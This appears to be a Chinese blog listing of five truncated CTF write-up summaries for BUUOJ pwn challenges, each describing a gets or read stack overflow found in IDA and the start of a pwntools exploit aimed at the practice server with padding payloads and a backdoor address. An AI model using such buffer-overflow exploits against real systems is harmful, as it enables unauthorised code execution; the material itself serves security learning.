摘要：放进IDA，看到有直接catflag的指令，但是要求v2为定值 因为getsv1，所以考虑让v1溢出填充v2的值 看一下这个float在内存中的十六进制（我不知道为啥是unsignedchar，char就不行） #include<iostream> #include<cstdio> #include 阅读全文

摘要：放进IDA，看main函数里有gets 要溢出，但是这个gets限制输入长度32，而s的长度是3C 注意到这里v0吧s里的I换成了you再赋值回s，所实际上只要20个I就能溢出了 后门 exp: from pwn import * p=remote('node3.buuoj.cn',27988) s 阅读全文

摘要：放进IDA，找到gets 接收0x40位，然后查看字符串，虽然没有bin/sh，但是有能直接用的 找到所在函数和地址 exp: from pwn import * p=remote('node3.buuoj.cn',27180) sys_addr=0x40060D payload='a'*(0x40 阅读全文

摘要：放进IDA，发现gets 只接受15个字节，可以溢出 然后在fun()里发现 找到地址 然后就可以写exp了 sendline那里一开始写的是send，然后timeout了…… from pwn import * p=remote('node3.buuoj.cn',25183) #elf=ELF(' 阅读全文

摘要：level0 放进IDA，查看main函数 顺着返回函数走 这里的buf只有80个字符，但是read能读入200个造成栈溢出 然后查看callsystem 写exp from pwn import * elf = ELF('./level0') p = remote('node3.buuoj.cn' 阅读全文